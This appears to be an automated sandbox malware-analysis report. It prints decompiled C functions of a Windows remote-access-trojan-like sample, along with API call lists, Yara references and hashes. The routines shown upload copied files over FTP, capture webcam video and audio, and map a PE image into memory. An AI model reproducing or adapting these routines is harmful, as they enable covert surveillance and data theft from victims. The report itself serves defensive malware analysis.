                                    0x240430c3
                                    0x240430c5
                                    0x240430c8
                                    0x240430cb
                                    0x240430db
                                    0x240430db
                                    0x24042e49
                                    0x24042e4f
                                    0x24042e6b
                                    0x24042eeb
                                    0x24042e74
                                    0x24042e7b
                                    0x24042e7c
                                    0x24042e81
                                    0x24042e84
                                    0x24042ea6
                                    0x24042eb6
                                    0x24042ebd
                                    0x24042ec0
                                    0x24042ee6
                                    0x24042ee6
                                    0x240431ac
                                    0x240431ae
                                    0x240431b1
                                    0x240431b4
                                    0x240431c4
                                    0x240431d4
                                    0x240431df
                                    0x240431e5
                                    0x240431f7
                                    0x240431f7

                                    APIs
                                    • Sleep.KERNEL32(00000032,?,00000000,240431F8,?,?,?,?,00000000,00000000), ref: 24042E74
                                      • Part of subcall function 24042DC8: GetTickCount.KERNEL32 ref: 24043070
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CountSleepTick
                                    • String ID: *.*$.tmp$ALL
                                    • API String ID: 2804873075-513194922
                                    • Opcode ID: 05c95c787f79140aac0fd1a93eac47bd873772d9fdbcd2238e0cd6e5beac0b46
                                    • Instruction ID: 33b6452aa6304aa3cc7d468c1b9af40279b63bf055704219c3b8e73a8938a811
                                    • Opcode Fuzzy Hash: 05c95c787f79140aac0fd1a93eac47bd873772d9fdbcd2238e0cd6e5beac0b46
                                    • Instruction Fuzzy Hash: 73B14F34B002199BFF11DB60DC90AEEB3B5EB99308F5085F5D808A7258DAB5AEC58F50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240500AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 160fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 64%
                                    			E240500AC(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr* _t37;
				void* _t44;
				intOrPtr* _t45;
				char* _t46;
				intOrPtr* _t63;
				intOrPtr* _t82;
				intOrPtr* _t84;
				intOrPtr* _t86;
				void* _t95;
				CHAR* _t103;
				void* _t104;
				void* _t105;
				intOrPtr* _t109;
				void* _t112;
				intOrPtr _t113;
				intOrPtr* _t124;
				void* _t127;
				void* _t128;
				intOrPtr _t130;
				intOrPtr _t131;

				_t128 = __esi;
				_t127 = __edi;
				_t112 = __edx;
				_t102 = __ebx;
				_t130 = _t131;
				_t105 = 7;
				do {
					_push(0);
					_push(0);
					_t105 = _t105 - 1;
				} while (_t105 != 0);
				_push(__ebx);
				_push(_t130);
				_push(0x240502d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t131;
				_t37 =  *0x2405ac44; // 0x240572fc
				_t133 =  *_t37;
				if( *_t37 == 0) {
					L18:
					_pop(_t113);
					 *[fs:eax] = _t113;
					_push(E240502DE);
					E240130AC( &_v60, 0xb);
					return E240130AC( &_v12, 2);
				}
				_t44 = E24016438( *0x240632f0, __ebx, _t105, _t133);
				if(_t112 != 0) {
					if(__eflags <= 0) {
						goto L18;
					}
					L7:
					_t45 =  *0x2405ac18; // 0x240570d8
					if( *_t45 != 0) {
						_t46 =  *0x2405ac54; // 0x2405b91a
						_t137 =  *_t46 - 1;
						if( *_t46 == 1) {
							E24016588( *0x240632f0, _t102,  &_v24, _t127, _t128, _t137);
							_push(_v24);
							E240158BC( &_v28, _t105, 0, GetTickCount(), 0);
							_push(_v28);
							_push(".txt");
							E240133FC();
							_t103 = E24013534(_v20);
							CopyFileA(E24013534( *0x240632f0), _t103, 0);
							SetFileAttributesA(_t103, 0x80);
							_t108 =  &_v12;
							E24016CE4(_v20, _t103,  &_v12,  &_v16, _t127, _t128, _t137);
							E24016634(_v20, _t103, _t127, _t128, _t137);
							_t138 = _v12;
							if(_v12 != 0) {
								_t63 =  *0x2405ac60; // 0x2405b988
								_push( *_t63);
								_push(0x240502fc);
								E24017064( &_v36, _t103, _t138);
								E24021B5C(_v36, _t103,  &_v32, _t127, _t128, _t138);
								_push(_v32);
								E240133FC();
								_push(_v8);
								_push(0x240502fc);
								E24016BD0( &_v40, _t103,  &_v12);
								_push(_v40);
								_push(0x24050308);
								E24016B28( &_v44, _t103, _t108);
								_push(_v44);
								_push(0x24050308);
								E24016B08( &_v48);
								_push(_v48);
								_push("___");
								E24016910( &_v52, _t103, _t108);
								_push(_v52);
								_push(0x24050308);
								E240169B8( &_v56, _t103, _t108);
								_push(_v56);
								_push(0x24050308);
								E24016A60( &_v60, _t103, _t108);
								_push(_v60);
								E240133FC();
								_t82 =  *0x2405aba0; // 0x2405b924
								_t84 =  *0x2405abc0; // 0x2405b928
								_t86 =  *0x2405ab20; // 0x2405b92c
								_t109 =  *0x2405ac2c; // 0x2405b91c
								_t104 = E24022134(_t103,  *_t109, 1, _t127, _t128,  *_t86,  *_t84,  *_t82);
								if(_t104 == 0 ||  *((char*)(_t104 + 0x18)) == 0) {
									E24012688(_t104);
								} else {
									_t124 =  *0x2405ab64; // 0x2405b920
									__eflags = E240222A8(_t104, _t104,  *_t124, __eflags);
									if(__eflags != 0) {
										_t95 = E240223C4(_t104, _t104, _v8, _v12, _t128, __eflags);
										__eflags = _t95;
										if(_t95 != 0) {
											E24012688(_t104);
										} else {
											E24012688(_t104);
										}
									} else {
										E24012688(_t104);
									}
								}
							}
						}
					}
					goto L18;
				}
				if(_t44 <= 0) {
					goto L18;
				} else {
					goto L7;
				}
			}





































                                    0x240500ac
                                    0x240500ac
                                    0x240500ac
                                    0x240500ac
                                    0x240500ad
                                    0x240500af
                                    0x240500b4
                                    0x240500b4
                                    0x240500b6
                                    0x240500b8
                                    0x240500b8
                                    0x240500bb
                                    0x240500be
                                    0x240500bf
                                    0x240500c4
                                    0x240500c7
                                    0x240500ca
                                    0x240500cf
                                    0x240500d2
                                    0x240502af
                                    0x240502b1
                                    0x240502b4
                                    0x240502b7
                                    0x240502c4
                                    0x240502d6
                                    0x240502d6
                                    0x240500dd
                                    0x240500e5
                                    0x240500f2
                                    0x00000000
                                    0x00000000
                                    0x240500f8
                                    0x240500f8
                                    0x24050100
                                    0x24050106
                                    0x2405010b
                                    0x2405010e
                                    0x2405011c
                                    0x24050121
                                    0x24050130
                                    0x24050135
                                    0x24050138
                                    0x24050145
                                    0x24050154
                                    0x24050162
                                    0x2405016d
                                    0x24050172
                                    0x2405017b
                                    0x24050183
                                    0x24050188
                                    0x2405018c
                                    0x24050192
                                    0x24050197
                                    0x24050199
                                    0x240501a1
                                    0x240501ac
                                    0x240501b1
                                    0x240501bc
                                    0x240501c1
                                    0x240501c4
                                    0x240501cc
                                    0x240501d1
                                    0x240501d4
                                    0x240501dc
                                    0x240501e1
                                    0x240501e4
                                    0x240501ec
                                    0x240501f1
                                    0x240501f4
                                    0x240501fc
                                    0x24050201
                                    0x24050204
                                    0x2405020c
                                    0x24050211
                                    0x24050214
                                    0x2405021c
                                    0x24050221
                                    0x2405022c
                                    0x24050231
                                    0x24050239
                                    0x24050241
                                    0x24050249
                                    0x2405025d
                                    0x24050261
                                    0x2405026b
                                    0x24050272
                                    0x24050272
                                    0x24050281
                                    0x24050283
                                    0x24050296
                                    0x2405029b
                                    0x2405029d
                                    0x240502aa
                                    0x2405029f
                                    0x240502a1
                                    0x240502a1
                                    0x24050285
                                    0x24050287
                                    0x24050287
                                    0x24050283
                                    0x24050261
                                    0x2405018c
                                    0x2405010e
                                    0x00000000
                                    0x24050100
                                    0x240500ea
                                    0x00000000
                                    0x240500f0
                                    0x00000000
                                    0x240500f0

                                    APIs
                                    • GetTickCount.KERNEL32 ref: 24050124
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 24050162
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,.txt,?,00000000,00000000,?,00000000,240502D7,?,?,00000000,00000000), ref: 2405016D
                                      • Part of subcall function 24022134: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 240221C0
                                      • Part of subcall function 24022134: InternetConnectA.WININET(00000000,00000000,00000000,00000000,00000000,00000001,08000000,00000000), ref: 240221F8
                                      • Part of subcall function 240223C4: FtpOpenFileA.WININET(00000000,00000000,40000000,00000002,00000000), ref: 24022431
                                      • Part of subcall function 240223C4: InternetWriteFile.WININET(00000000,?,00000001,?), ref: 2402248F
                                      • Part of subcall function 240223C4: InternetCloseHandle.WININET(00000000), ref: 240224DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: FileInternet$Open$AttributesCloseConnectCopyCountHandleTickWrite
                                    • String ID: .txt$___
                                    • API String ID: 3003208719-4103982732
                                    • Opcode ID: 45d66a4ddc082909df97957d8a8f78d3f16ed1ed7300586d1d6a09c7747f7f16
                                    • Instruction ID: 04776145ebd19304adb770b2ee5b1acf71dd72999ae551442157f32a282f07b1
                                    • Opcode Fuzzy Hash: 45d66a4ddc082909df97957d8a8f78d3f16ed1ed7300586d1d6a09c7747f7f16
                                    • Instruction Fuzzy Hash: 8F511834A0020AABEB01DFE4DC91F9D77BAFB68204F504475E504B7269CA78AEC9CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403F404, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E2403F404(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				long _v16;
				int _v20;
				int _v24;
				void* _t18;
				intOrPtr _t21;
				struct HWND__* _t23;
				int _t31;
				int _t32;

				_t31 = _a12;
				_t32 = _a8;
				_t23 = _a4;
				_v8 = CallWindowProcA(GetPropA(_t23, "WNDPROC"), _t23, _t32, _t31, _a16);
				_t18 = GetPropA(_t23, "OBJECT");
				if(_t32 != 2) {
					if(_t18 != 0) {
						_v24 = _t32;
						_v20 = _t31;
						_v16 = _a16;
						_v12 = 0;
						 *((intOrPtr*)( *_t18 - 0x14))();
						_t21 = _v12;
						if(_t21 != 0) {
							_v8 = _t21;
						}
					}
				} else {
					if(_t18 != 0) {
						E24012688(_t18);
					}
				}
				return _v8;
			}













                                    0x2403f40d
                                    0x2403f410
                                    0x2403f413
                                    0x2403f42e
                                    0x2403f437
                                    0x2403f441
                                    0x2403f450
                                    0x2403f452
                                    0x2403f455
                                    0x2403f45b
                                    0x2403f460
                                    0x2403f468
                                    0x2403f46b
                                    0x2403f470
                                    0x2403f472
                                    0x2403f472
                                    0x2403f470
                                    0x2403f443
                                    0x2403f445
                                    0x2403f447
                                    0x2403f447
                                    0x2403f445
                                    0x2403f47e

                                    APIs
                                    • GetPropA.USER32(?,WNDPROC), ref: 2403F41C
                                    • CallWindowProcA.USER32(00000000,?,?,?,?), ref: 2403F429
                                    • GetPropA.USER32(?,OBJECT), ref: 2403F437
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Prop$CallProcWindow
                                    • String ID: OBJECT$WNDPROC
                                    • API String ID: 1345539330-55689305
                                    • Opcode ID: 02d8c39e52fd66965a58d18379e46cf3b3a799ad8818a7a8c15a848fcf096884
                                    • Instruction ID: 561acebf9efbeba925220d79ff6d927574f2c54d9b131808e70b47fb4e9d7421
                                    • Opcode Fuzzy Hash: 02d8c39e52fd66965a58d18379e46cf3b3a799ad8818a7a8c15a848fcf096884
                                    • Instruction Fuzzy Hash: 580156B1A00209BB9B00DF66CD84D9FBFFDEF85250B108165E915AB244D730DE40CBB1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403B624, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24windowCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 28%
                                    			E2403B624() {
				struct HWND__* _t1;

				_push(1);
				_t1 =  *0x2405ca68;
				_push(_t1);
				_push(0x1e0);
				_push(0x280);
				_push(0);
				_push(0);
				_push(0x50000000);
				_push("Video");
				L2403B504();
				 *0x2405ca6c = _t1;
				SendMessageA( *0x2405ca6c, 0x40b, 0, 0);
				 *0x2405ca6c = 0;
				return UnregisterClassA("MainForm",  *0x2405caa4);
			}




                                    0x2403b624
                                    0x2403b626
                                    0x2403b62b
                                    0x2403b62c
                                    0x2403b631
                                    0x2403b636
                                    0x2403b638
                                    0x2403b63a
                                    0x2403b63f
                                    0x2403b644
                                    0x2403b649
                                    0x2403b65d
                                    0x2403b664
                                    0x2403b679

                                    APIs
                                    • 6F6121E0.AVICAP32(Video,50000000,00000000,00000000,00000280,000001E0,?,00000001,24049038,000003E8,000003E8,2404E184,webcamgetbuffer,2404E184,webcam,2404E184), ref: 2403B644
                                    • SendMessageA.USER32(?,0000040B,00000000,00000000), ref: 2403B65D
                                    • UnregisterClassA.USER32(MainForm,?), ref: 2403B674
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ClassF6121MessageSendUnregister
                                    • String ID: MainForm$Video
                                    • API String ID: 3997333328-2964836702
                                    • Opcode ID: 3911707d7f9b5fd558a74f7fa3bd5462fc4cdd8281d34963ba894ee815b95535
                                    • Instruction ID: 2565729db35380ffbebeb2c9aae85dcdf7f2c0039150ca2de86303e26dd26cdf
                                    • Opcode Fuzzy Hash: 3911707d7f9b5fd558a74f7fa3bd5462fc4cdd8281d34963ba894ee815b95535
                                    • Instruction Fuzzy Hash: 45E00AB1A842507BF750EFA9CC52F552EA8E754B0DF944420F704FE5C5D5AC66C08F18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24054594, Relevance: 7.7, APIs: 5, Instructions: 177memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 80%
                                    			E24054594(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, long __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				signed int _v52;
				long _v56;
				char _v60;
				void* _t135;
				intOrPtr _t138;
				void* _t150;
				signed int _t184;
				signed int _t185;
				intOrPtr _t189;
				intOrPtr _t197;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t209;
				signed int _t210;
				void* _t213;
				void* _t216;
				intOrPtr* _t217;

				_t208 = __edi;
				_t215 = _t216;
				_t217 = _t216 + 0xffffffc8;
				_push(__edi);
				_v44 = __ecx;
				_t183 = __edx;
				_v40 = __eax;
				_t197 =  *0x24053e90; // 0x24053e94
				E240139CC( &_v36, _t197);
				_push(_t216);
				_push(0x2405478e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				_push(0);
				_push(_v44);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				_v8 =  *((intOrPtr*)(_v44 + 0x3c)) +  *_t217;
				_v16 = VirtualAlloc(__edx,  *(_v8 + 0x50), 0x2000, 1);
				_v12 = _v16 -  *((intOrPtr*)(_v8 + 0x34));
				_v48 = VirtualAlloc(_v16,  *(_v8 + 0x54), 0x1000, 4);
				E24011494(_v44,  *(_v8 + 0x54), _v48);
				VirtualProtect(_v48,  *(_v8 + 0x54), 2,  &_v56);
				_t213 = _v8 + 0x18 + ( *(_v8 + 0x14) & 0x0000ffff);
				_t135 = ( *(_v8 + 6) & 0x0000ffff) - 1;
				if(_t135 >= 0) {
					_v60 = _t135 + 1;
					_t185 = 0;
					do {
						_t208 =  *(_t213 + 8 + (_t185 + _t185 * 4) * 8);
						_v52 =  *((intOrPtr*)(_t213 + 0x10 + (_t185 + _t185 * 4) * 8));
						if(_t208 < _v52) {
							_t210 = _t208 ^ _v52;
							_v52 = _v52 ^ _t210;
							_t208 = _t210 ^ _v52;
						}
						_v48 = VirtualAlloc( *((intOrPtr*)(_t213 + 0xc + (_t185 + _t185 * 4) * 8)) + _v16, _t208, 0x1000, 4);
						E24011CF0(_v48, _t208);
						E24011494( *((intOrPtr*)(_t213 + 0x14 + (_t185 + _t185 * 4) * 8)) + _v44, _v52, _v48);
						_t185 = _t185 + 1;
						_t66 =  &_v60;
						 *_t66 = _v60 - 1;
					} while ( *_t66 != 0);
				}
				_t138 =  *((intOrPtr*)(_v8 + 0x28)) + _v16;
				_v28 = _t138;
				_v24 = _t138;
				_v36 = _v16;
				_v32 =  *(_v8 + 0x50);
				_push(0);
				E240144F4();
				_t145 =  *((intOrPtr*)(_v8 + 0xa0));
				if( *((intOrPtr*)(_v8 + 0xa0)) != 0) {
					E240543DC(_t145 + _v16, _t215);
				}
				_t147 =  *((intOrPtr*)(_v8 + 0x80));
				if( *((intOrPtr*)(_v8 + 0x80)) != 0) {
					E24054458(_t147 + _v16, _t183, _t208, _t213, _t215);
				}
				_t150 = ( *(_v8 + 6) & 0x0000ffff) - 1;
				if(_t150 >= 0) {
					_v60 = _t150 + 1;
					_t184 = 0;
					do {
						_t209 = _t184 + _t184 * 4;
						VirtualProtect( *((intOrPtr*)(_t213 + 0xc + _t209 * 8)) + _v16,  *(_t213 + 8 + _t209 * 8), E2405436C( *((intOrPtr*)(_t213 + 0x24 + _t209 * 8))),  &_v56);
						_t184 = _t184 + 1;
						_t101 =  &_v60;
						 *_t101 = _v60 - 1;
					} while ( *_t101 != 0);
				}
				_t189 =  *0x24053e90; // 0x24053e94
				E24013CA4(_a4, _t189,  &_v36);
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(0x24054795);
				_t205 =  *0x24053e90; // 0x24053e94
				return E24013A90( &_v36, _t205);
			}































                                    0x24054594
                                    0x24054595
                                    0x24054597
                                    0x2405459c
                                    0x2405459d
                                    0x240545a0
                                    0x240545a2
                                    0x240545a8
                                    0x240545ae
                                    0x240545b5
                                    0x240545b6
                                    0x240545bb
                                    0x240545be
                                    0x240545c6
                                    0x240545c7
                                    0x240545ce
                                    0x240545d2
                                    0x240545d9
                                    0x240545f0
                                    0x240545fc
                                    0x24054616
                                    0x24054625
                                    0x2405463b
                                    0x2405464d
                                    0x24054656
                                    0x24054659
                                    0x2405465c
                                    0x2405465f
                                    0x24054661
                                    0x24054664
                                    0x2405466f
                                    0x24054675
                                    0x24054677
                                    0x2405467a
                                    0x2405467d
                                    0x2405467d
                                    0x24054698
                                    0x240546a2
                                    0x240546b7
                                    0x240546bc
                                    0x240546bd
                                    0x240546bd
                                    0x240546bd
                                    0x24054661
                                    0x240546c8
                                    0x240546cb
                                    0x240546ce
                                    0x240546d4
                                    0x240546dd
                                    0x240546e0
                                    0x240546f0
                                    0x240546fb
                                    0x24054703
                                    0x24054709
                                    0x2405470e
                                    0x24054712
                                    0x2405471a
                                    0x24054720
                                    0x24054725
                                    0x2405472d
                                    0x24054730
                                    0x24054733
                                    0x24054736
                                    0x24054738
                                    0x2405473c
                                    0x24054756
                                    0x2405475b
                                    0x2405475c
                                    0x2405475c
                                    0x2405475c
                                    0x24054738
                                    0x24054767
                                    0x2405476d
                                    0x24054774
                                    0x24054777
                                    0x2405477a
                                    0x24054782
                                    0x2405478d

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 240545EB
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000001), ref: 24054611
                                    • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 2405463B
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 24054693
                                    • VirtualProtect.KERNEL32(?,?,00000000,?,00000001), ref: 24054756
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$Protect
                                    • String ID:
                                    • API String ID: 655996629-0
                                    • Opcode ID: 80409a3382d9cca7a2fd7ecdd1f5b95de010cff772ed018fb5c22d58ce477088
                                    • Instruction ID: 1c9ff9165b438982143258646b9eeb421bfae3b6bbe099b1f608e48deb78317f
                                    • Opcode Fuzzy Hash: 80409a3382d9cca7a2fd7ecdd1f5b95de010cff772ed018fb5c22d58ce477088
                                    • Instruction Fuzzy Hash: 6C71BE75A00208AFDB01CFA8D984EEEB7F9FF48314F558065E904EB265D670EE94CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24041FE4, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 152sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 60%
                                    			E24041FE4(void* __ebx, void* __edi, void* __esi) {
				short _v8;
				short _v10;
				intOrPtr _v14;
				signed int _v18;
				signed int _v20;
				char _v28;
				intOrPtr _t53;
				short _t87;
				intOrPtr _t103;
				intOrPtr _t114;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t124;

				_t120 = __esi;
				_t119 = __edi;
				_t85 = __ebx;
				_t122 = _t123;
				_t124 = _t123 + 0xffffffe8;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v28 = 0;
				_push(_t122);
				_push(0x24042284);
				_push( *[fs:eax]);
				 *[fs:eax] = _t124;
				if( *0x24063244 != 0) {
					E24012688( *0x24063244);
					 *0x24063244 = 0;
				}
				 *0x24063244 = E24012658(1);
				E24041B9C();
				 *0x24063248 = 0;
				_push(_t122);
				_push(0x24042222);
				_push( *[fs:eax]);
				 *[fs:eax] = _t124;
				 *0x24063240 = E24012658(1);
				E24022908( *0x24063240, _t85,  *0x24063230,  *0x2406322c, _t119, _t120, 0);
				_push(_t122);
				_push(0x240420d2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t124;
				_push( *0x24063228);
				_push("|Y|");
				_push("resposta");
				_push(0x240422bc);
				_push( *0x24063234);
				_push(0x240422bc);
				_push("audio");
				_push(0x240422bc);
				_push("audiogetbuffer");
				E240133FC();
				E24038F28( *0x24063240, _t85, _v28, _t119, _t120, 0);
				_t103 = 0x240422bc;
				 *[fs:eax] = _t103;
				Sleep(0x3e8);
				if( *((char*)( *0x24063240 + 0x10)) != 0) {
					_v18 =  *0x24063238;
					_v20 =  *0x2406323c;
					_v8 = 0x10;
					_v14 = (_v20 & 0x0000ffff) * _v18 + (_v20 & 0x0000ffff) * _v18;
					_t87 = _v20 + _v20;
					_v10 = _t87;
					__eflags =  *0x24063220;
					if( *0x24063220 == 0) {
						 *0x24063220 = E24041294(1);
					}
					__eflags =  *0x24063224;
					if( *0x24063224 == 0) {
						 *0x24063224 = E24041760(1);
					}
					_t53 =  *0x24063224;
					 *((intOrPtr*)(_t53 + 0xa4)) =  *0x24063244;
					 *((intOrPtr*)(_t53 + 0xa0)) = E24041F5C;
					 *((short*)( *0x24063220 + 0x15e)) = _v20;
					 *( *0x24063220 + 0x160) = _v18;
					 *((intOrPtr*)( *0x24063220 + 0x164)) = _v14;
					 *((short*)( *0x24063220 + 0x168)) = _t87;
					 *((short*)( *0x24063220 + 0x16a)) = _v8;
					E24041504( *0x24063220,  *((intOrPtr*)( *0x24063220 + 0x164)));
					E24041A30( *0x24063224,  *((intOrPtr*)( *0x24063220 + 0xf8)));
					E240414E8( *0x24063220, 1);
					E240418F8( *0x24063220 + 0x15c);
					_pop(_t114);
					 *[fs:eax] = _t114;
					L10:
					E24038298();
					goto L10;
				}
				E24012688( *0x24063240);
				_pop(_t117);
				 *[fs:eax] = _t117;
				_pop(_t118);
				 *[fs:eax] = _t118;
				_push(0x2404228b);
				return E24013088( &_v28);
			}


















                                    0x24041fe4
                                    0x24041fe4
                                    0x24041fe4
                                    0x24041fe5
                                    0x24041fe7
                                    0x24041fea
                                    0x24041feb
                                    0x24041fec
                                    0x24041fef
                                    0x24041ff4
                                    0x24041ff5
                                    0x24041ffa
                                    0x24041ffd
                                    0x24042007
                                    0x2404200e
                                    0x24042015
                                    0x24042015
                                    0x24042026
                                    0x2404202b
                                    0x24042030
                                    0x24042039
                                    0x2404203a
                                    0x2404203f
                                    0x24042042
                                    0x24042051
                                    0x24042067
                                    0x2404206e
                                    0x2404206f
                                    0x24042074
                                    0x24042077
                                    0x2404207a
                                    0x24042080
                                    0x24042085
                                    0x2404208a
                                    0x2404208f
                                    0x24042095
                                    0x2404209a
                                    0x2404209f
                                    0x240420a4
                                    0x240420b6
                                    0x240420c3
                                    0x240420ca
                                    0x240420cd
                                    0x240420e1
                                    0x240420ef
                                    0x2404210d
                                    0x24042116
                                    0x2404211a
                                    0x24042129
                                    0x24042130
                                    0x24042132
                                    0x24042136
                                    0x2404213d
                                    0x2404214b
                                    0x2404214b
                                    0x24042150
                                    0x24042157
                                    0x24042165
                                    0x24042165
                                    0x2404216a
                                    0x24042175
                                    0x2404217b
                                    0x2404218e
                                    0x2404219d
                                    0x240421ab
                                    0x240421b6
                                    0x240421c6
                                    0x240421dd
                                    0x240421f2
                                    0x240421fe
                                    0x24042213
                                    0x2404221a
                                    0x2404221d
                                    0x24042267
                                    0x24042267
                                    0x00000000
                                    0x24042267
                                    0x240420f6
                                    0x240420fd
                                    0x24042100
                                    0x24042270
                                    0x24042273
                                    0x24042276
                                    0x24042283

                                    APIs
                                    • Sleep.KERNEL32(000003E8,audio,240422BC,240422BC,resposta,|Y|,00000000,240420D2,?,00000000,24042222,?,00000000,24042284), ref: 240420E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: audio$audiogetbuffer$resposta$|Y|
                                    • API String ID: 3472027048-441611841
                                    • Opcode ID: 93577e2af3532f6d87b5c6bdfdf9687f720a853cbcf13409bb80e1f71573984e
                                    • Instruction ID: d092f3f74fd2ef38590b8f0dc71deadef427819ff1d6f00f2290d1a6b2f2aeba
                                    • Opcode Fuzzy Hash: 93577e2af3532f6d87b5c6bdfdf9687f720a853cbcf13409bb80e1f71573984e
                                    • Instruction Fuzzy Hash: C2516A34A00206EFD301DF64D994A9A7BF0FB5C704F5185B9F815AB769D7B99AC0CB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403ADC0, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 139sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 67%
                                    			E2403ADC0(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v352;
				char _v33121;
				char _v33128;
				char _v33132;
				char _v33136;
				void* _t41;
				intOrPtr* _t51;
				intOrPtr* _t52;
				char* _t58;
				long _t67;
				void* _t92;
				intOrPtr _t107;
				intOrPtr _t112;
				void* _t114;
				void* _t115;
				intOrPtr _t116;

				_t110 = __edi;
				_t93 = __ecx;
				_t114 = _t115;
				_push(__eax);
				_t41 = 8;
				do {
					_t115 = _t115 + 0xfffff004;
					_push(_t41);
					_t41 = _t41 - 1;
				} while (_t41 != 0);
				_t116 = _t115 + 0xfffffe98;
				_push(__edi);
				_v33132 = 0;
				_v33136 = 0;
				_v33128 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t112 = _v8;
				E24013524(_v8);
				E24013524(_v12);
				_push(_t114);
				_push(0x2403b027);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116;
				_t92 = 0;
				_v20 = E24012658(1);
				while( *((char*)(_v20 + 0x10)) == 0) {
					_t119 = _t92 - 0xa;
					if(_t92 < 0xa) {
						E24022B24(_t112,  &_v33128);
						_push(_v33128);
						_t93 = E24022B58(_t112);
						_pop(1);
						E24022908(_v20, _t92, _t87, 1, _t110, _t112, __eflags);
						Sleep(0xa);
						_t92 = _t92 + 1;
						__eflags = _t92;
						continue;
					}
					break;
				}
				_t51 =  *0x2405abb0; // 0x2405b8dc
				_push( *_t51);
				_push("|Y|");
				_push("resposta");
				_push(0x2403b060);
				_t52 =  *0x2405abec; // 0x2405b98c
				_push( *_t52);
				_push(0x2403b060);
				_push(_v8);
				E240158BC( &_v33136, _t93, 1, _a16, _a20);
